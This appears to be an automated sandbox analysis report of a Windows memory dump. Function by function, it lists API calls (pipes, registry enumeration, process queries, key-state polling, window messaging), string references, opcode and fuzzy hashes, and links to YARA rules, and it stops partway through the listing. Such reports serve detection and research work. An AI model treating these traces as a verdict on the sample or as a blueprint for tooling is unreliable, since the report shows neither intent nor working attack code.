Uniqueness

Uniqueness Score: -1.00%

Function 001A703E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 001A705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001A7091
GetStdHandle.KERNEL32(0000000C), ref: 001A70A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 001A70DD

Strings

nul, xrefs: 001A70D8

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 0831fb12b5d15e06d1ac60186d1bf7c7ebbcf2666738f06f173360c8a5f63747
Instruction ID: cfc813ed5fae588afacc3de6b985db754bbe30d375df5c75a6b9025fa5ba3540
Opcode Fuzzy Hash: 0831fb12b5d15e06d1ac60186d1bf7c7ebbcf2666738f06f173360c8a5f63747
Instruction Fuzzy Hash: 94215178504309AFDB209F29DD05A9ABBA8AF57720F204A29FDA1D72D0E770DA518B50

Uniqueness

Uniqueness Score: -1.00%

Function 001A710C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 001A712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001A715D
GetStdHandle.KERNEL32(000000F6), ref: 001A716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001A71A8

Strings

nul, xrefs: 001A71A3

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 58281964704e11c5b7be483886da6dcc10177dc1b84d8a9eea1abb976d1c2291
Instruction ID: fc6fa8a444fcbfebab367c44fca55300afc3b425be17f24d9f4b455de96dda99
Opcode Fuzzy Hash: 58281964704e11c5b7be483886da6dcc10177dc1b84d8a9eea1abb976d1c2291
Instruction Fuzzy Hash: EE2195796043059BDB209F68DC44EAAB7E8AF56730F200A19FDB1D72D0E770D941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001AAEAB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001AAEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001AAF13
__swprintf.LIBCMT ref: 001AAF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,001CF910), ref: 001AAF6A

Strings

%lu, xrefs: 001AAF26

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: c85a2488263330ec6dc236131488fc29e6dbc1b51265870457d5515e73db103b
Instruction ID: f9949471be1102439abede403bdad757c19f9349125707953afca8c5871ce8dd
Opcode Fuzzy Hash: c85a2488263330ec6dc236131488fc29e6dbc1b51265870457d5515e73db103b
Instruction Fuzzy Hash: 71218334A00109AFCB10DF65CC85EAE7BB9EF89704B104069F909EB261DB71EA45CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0019A52F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00147D2C: _memmove.LIBCMT ref: 00147D66

Part of subcall function 0019A37C: SendMessageTimeoutW.USER32 ref: 0019A399
Part of subcall function 0019A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0019A3AC
Part of subcall function 0019A37C: GetCurrentThreadId.KERNEL32 ref: 0019A3B3
Part of subcall function 0019A37C: AttachThreadInput.USER32(00000000), ref: 0019A3BA

GetFocus.USER32(001CF910), ref: 0019A554

Part of subcall function 0019A3C5: GetParent.USER32(?), ref: 0019A3D3

GetClassNameW.USER32 ref: 0019A59D
EnumChildWindows.USER32 ref: 0019A5C5
__swprintf.LIBCMT ref: 0019A5DF

Strings

%s%d, xrefs: 0019A5D9

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 8bcc6ce52d9482d90a561c30ac69ba0d2a9cde43519ce2b133248c17a7cd73d0
Instruction ID: edc8e480222ba99303322a165c07e1b9a749800a08265ae2d5b53f03dbe934b2
Opcode Fuzzy Hash: 8bcc6ce52d9482d90a561c30ac69ba0d2a9cde43519ce2b133248c17a7cd73d0
Instruction Fuzzy Hash: A311B4716402087BDF10BFB0DC85FEA3B7DAF58710F044079BD08AA192CB709A4A8BB5

Uniqueness

Uniqueness Score: -1.00%

Function 001A2017, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 001A2048

Strings

EXISTS, xrefs: 001A2070
APPEND, xrefs: 001A2081
KEYS, xrefs: 001A205F
REMOVE, xrefs: 001A204E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 18a6a7b7e9fcd8d81e45df79f3336cf5e9348c8fc3de8896d43d2a2198433772
Instruction ID: ab432734cf651a5f18960c78e7380519a8833e79bf1aa068cad01e504917db18
Opcode Fuzzy Hash: 18a6a7b7e9fcd8d81e45df79f3336cf5e9348c8fc3de8896d43d2a2198433772
Instruction Fuzzy Hash: 5E11617490010DDFCF00EFA4DA514FEB7B4FF26304B508569E965A7252EB325916CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001BEE69, Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001BEF1B
GetProcessIoCounters.KERNEL32 ref: 001BEF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 001BF07E
CloseHandle.KERNEL32(?), ref: 001BF0FF

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 86f1d1c85ecb5de9ac0869634f71291829a4ff5fdbb2536d1a107c9658b3c5df
Instruction ID: b75ec43d3069f0c5823f0d9e220c9a7c29f7ac585cfe3bf4e0e9c356c0073f4a
Opcode Fuzzy Hash: 86f1d1c85ecb5de9ac0869634f71291829a4ff5fdbb2536d1a107c9658b3c5df
Instruction Fuzzy Hash: D58160716043119FD720EF28CC86F6AB7E5AF98720F14885DF999DB3A2DB70AC418B51

Uniqueness

Uniqueness Score: -1.00%

Function 0016564D, Relevance: 7.7, APIs: 5, Instructions: 163COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001656AB
_memcpy_s.LIBCMT ref: 0016571D
__read_nolock.LIBCMT ref: 0016577B
__filbuf.LIBCMT ref: 0016579E
_memset.LIBCMT ref: 001657E2

Part of subcall function 00168D68: __getptd_noexit.LIBCMT ref: 00168D68

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: fd1a262b7e6f1cb596d0076786feeeb097306c284ce0f321d4276a437e8c5e71
Instruction ID: 51dc233c78dec26c5ea85074625121491327d7a1bccfe9ac58f84c0ccbb812ed
Opcode Fuzzy Hash: fd1a262b7e6f1cb596d0076786feeeb097306c284ce0f321d4276a437e8c5e71
Instruction Fuzzy Hash: 54519171A00B05DBDB288FA9CC8466E77B7AF50324FA58729F835962D0D7709D70DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001C02C2, Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00147F41: _memmove.LIBCMT ref: 00147F82

Part of subcall function 001C10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001C0038,?,?), ref: 001C10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001C0388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001C03C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001C040E
RegCloseKey.ADVAPI32(?,?), ref: 001C043A
RegCloseKey.ADVAPI32(00000000), ref: 001C0447

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: a1bc81d8ccaf24761b190a2e6d3cbc9cf3008aaa5ddba972433a8017d2f337a2
Instruction ID: 6b22222cab43488f24c8271b13ab089f0280319a483df4a5f528a58427be7bd8
Opcode Fuzzy Hash: a1bc81d8ccaf24761b190a2e6d3cbc9cf3008aaa5ddba972433a8017d2f337a2
Instruction Fuzzy Hash: 16514631208244EFDB05EB64C885F6FB7E9FFA8704F44892DB595872A2DB30E905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 001AE7DC, Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32 ref: 001AE88A
GetPrivateProfileSectionW.KERNEL32 ref: 001AE8B3
WritePrivateProfileSectionW.KERNEL32 ref: 001AE8F2

Part of subcall function 00149997: __itow.LIBCMT ref: 001499C2
Part of subcall function 00149997: __swprintf.LIBCMT ref: 00149A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 001AE917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001AE91F

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 35cd0e2c76281b3f8be434058cd9425f244e8447e4565146d5e8e80117ad293f
Instruction ID: 35261207880d131ae57d1dd5499dac9c4ea6115417a943c955a7e2bb279ab435
Opcode Fuzzy Hash: 35cd0e2c76281b3f8be434058cd9425f244e8447e4565146d5e8e80117ad293f
Instruction Fuzzy Hash: D9511D39A00215EFCF01EF64C9819AEBBF5FF59314B148099E849AB362CB31ED51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001CA2C5, Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c7f54a1541017faa479a8431079b7c333ac0e7a022db30f84148336ba4422c0
Instruction ID: fbe13a9f5b4139da4c863a8b459171f477ec858c362425827b479efa1cbca7d8
Opcode Fuzzy Hash: 8c7f54a1541017faa479a8431079b7c333ac0e7a022db30f84148336ba4422c0
Instruction Fuzzy Hash: CE41213590024CAFC725DB28CC58FA9BBA9FF29314F89422CF955A72E1C730ED81CA51

Uniqueness

Uniqueness Score: -1.00%

Function 00142344, Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?,?,002067B0,?,002067B0,002067B0,?,001CC247,00000000,00000001,?,?,?,0017BC4F,?,?), ref: 00142357
ScreenToClient.USER32 ref: 00142374
GetAsyncKeyState.USER32(00000002), ref: 00142399
GetAsyncKeyState.USER32(00000001), ref: 001423A7

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 0c70cfe55de769e85f02bd68370712d995ad79083a889d2bee3a1698f29a282d
Instruction ID: af0c4f84336ac4e058502a76fc92cd79ad4d308e0bad54d58d05ff3174b8c765
Opcode Fuzzy Hash: 0c70cfe55de769e85f02bd68370712d995ad79083a889d2bee3a1698f29a282d
Instruction Fuzzy Hash: 29418231504119FBDF199F68C844EEEBB75FB19320F60836AF829962A1C7349990DFD1

Uniqueness

Uniqueness Score: -1.00%

Function 00196920, Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 0019695D
TranslateAcceleratorW.USER32(?,?,?), ref: 001969A9
TranslateMessage.USER32(?), ref: 001969D2
DispatchMessageW.USER32 ref: 001969DC
PeekMessageW.USER32 ref: 001969EB

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 5d6ec915d4315dfb6323cb96b247d005cb7bc3d1d185099d52dd4c9d47a64908
Instruction ID: b053fb1603d0db8ff38970a128be5077bb90e8ab476eadbe5e9e114d26c343a8
Opcode Fuzzy Hash: 5d6ec915d4315dfb6323cb96b247d005cb7bc3d1d185099d52dd4c9d47a64908
Instruction Fuzzy Hash: F131D231900256AEDF24CF74DC4CFB6BBACAB11308F104169E421D75A2D734D89AD7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00198F01, Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00198F12
PostMessageW.USER32(?,00000201,00000001), ref: 00198FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00198FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00198FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00198FDA

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 872871091f56d71b2f05359895a22a6e392d4f8f1f24e78a17d671b0df3fdae2
Instruction ID: 8b49332a594265de6486470288f0fa2b26b3c1870d92b11cbeabd1dac6815aed
Opcode Fuzzy Hash: 872871091f56d71b2f05359895a22a6e392d4f8f1f24e78a17d671b0df3fdae2
Instruction Fuzzy Hash: FC31CC71500219EFDF14CFA8D94CAAE7BB6EB06325F104229F925EA2D0C7B0DA54DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0019B6AF, Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0019B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0019B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0019B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0019B742
_wcsstr.LIBCMT ref: 0019B74C

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: def5bdbc1e84c67b9b8a06e5f3ce89ae3aaed1757b6ee3be17fd079097e90d72
Instruction ID: e9b12b86938dec01a493d43e9ebd4386d80c7bf51262211844c9d095628ced54
Opcode Fuzzy Hash: def5bdbc1e84c67b9b8a06e5f3ce89ae3aaed1757b6ee3be17fd079097e90d72
Instruction Fuzzy Hash: AA212931208214BBEF295B79AD89E7B7B99DF89710F10413DFC05CA1A1EF61DC4197A0

Uniqueness

Uniqueness Score: -1.00%

Function 001CB405, Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00142612: GetWindowLongW.USER32(?,000000EB), ref: 00142623

GetWindowLongW.USER32(?,000000F0), ref: 001CB44C
SetWindowLongW.USER32 ref: 001CB471
SetWindowLongW.USER32 ref: 001CB489
GetSystemMetrics.USER32 ref: 001CB4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,001B1184,00000000), ref: 001CB4D0

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: ddf93503469cb175d4ee89474f38ecd2363c89fec2c1119cd1138a9ab969ffb1
Instruction ID: 2ef198ceeb40922a6c8ce6a20251f90255979ac07155865cde3081ed440bf17a
Opcode Fuzzy Hash: ddf93503469cb175d4ee89474f38ecd2363c89fec2c1119cd1138a9ab969ffb1
Instruction Fuzzy Hash: 81218031918255AFCB188F38DC89F6A3BA5EB15720F15872CF926D71E2E730D861DB80

Uniqueness

Uniqueness Score: -1.00%

Function 001412F3, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0014134D
SelectObject.GDI32(?,00000000), ref: 0014135C
BeginPath.GDI32(?), ref: 00141373
SelectObject.GDI32(?,00000000), ref: 0014139C

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: db5a8d01d0ccd21350500850efa841a88b7c7ba3e1f03d300b13c650f5ebf6d6
Instruction ID: f24e524d9bbfca27071b138208b47b7302f41f8c0c5e14df0449b7f724a391d9
Opcode Fuzzy Hash: db5a8d01d0ccd21350500850efa841a88b7c7ba3e1f03d300b13c650f5ebf6d6
Instruction Fuzzy Hash: 1A213971800308EBDB119F25EC0CBA97BF9FB00761F14822AF814965B2D77199EADB91

Uniqueness

Uniqueness Score: -1.00%

Function 0019C161, Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0019C176
_memcmp.LIBCMT ref: 0019C194
_memcmp.LIBCMT ref: 0019C1A7
_memcmp.LIBCMT ref: 0019C1BF
_memcmp.LIBCMT ref: 0019C1D7

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 798b65d34e1f7d838189b38301e0f2c12ff3c43d85574447bb937307530e237c
Instruction ID: 5d54b85ef0154dd9a5b757dc3ee6b141f36251a5118fa267776b579d0562ad3b
Opcode Fuzzy Hash: 798b65d34e1f7d838189b38301e0f2c12ff3c43d85574447bb937307530e237c
Instruction Fuzzy Hash: F201D8B1A04115BBEA04A6209D42FAB735C9F31394F484032FD5497383E7E0EE21C2F9

Uniqueness

Uniqueness Score: -1.00%

Function 001A4D35, Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 001A4D5C
__beginthreadex.LIBCMT ref: 001A4D7A
MessageBoxW.USER32(?,?,?,?), ref: 001A4D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001A4DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001A4DAC

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 552d25e0023e00da6f301b6e9c6cf6bc27c56fd4a2c8849d63f6f729413fb588
Instruction ID: 8c267e9b77320d4680fa5887c9700cdc20d60b251d01093850d72a48c8fa51d4
Opcode Fuzzy Hash: 552d25e0023e00da6f301b6e9c6cf6bc27c56fd4a2c8849d63f6f729413fb588
Instruction Fuzzy Hash: CE11E576904359BFC7019BB8AC0CAAA7FADEB95320F144269FD14D3251D7B18D5087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0019874A, Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00198766
GetLastError.KERNEL32(?,0019822A,?,?,?), ref: 00198770
GetProcessHeap.KERNEL32(00000008,?,?,0019822A,?,?,?), ref: 0019877F
HeapAlloc.KERNEL32(00000000,?,0019822A,?,?,?), ref: 00198786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0019879D

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 2dee558426c31483cbbf1e225415ebbfccf9aad5ae3d26b433967eb819483ad6
Instruction ID: 293572dad0d56531afdc7efe42e6d8942a62a95174051fd89124e372f02ddb38
Opcode Fuzzy Hash: 2dee558426c31483cbbf1e225415ebbfccf9aad5ae3d26b433967eb819483ad6
Instruction Fuzzy Hash: 02012471200208BF9B244FA6DC88D6BBFAEEF8A355B200429F849C2260DB31CC41DA60

Uniqueness

Uniqueness Score: -1.00%

Function 001A54E6, Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001A5502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 001A5510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 001A5518
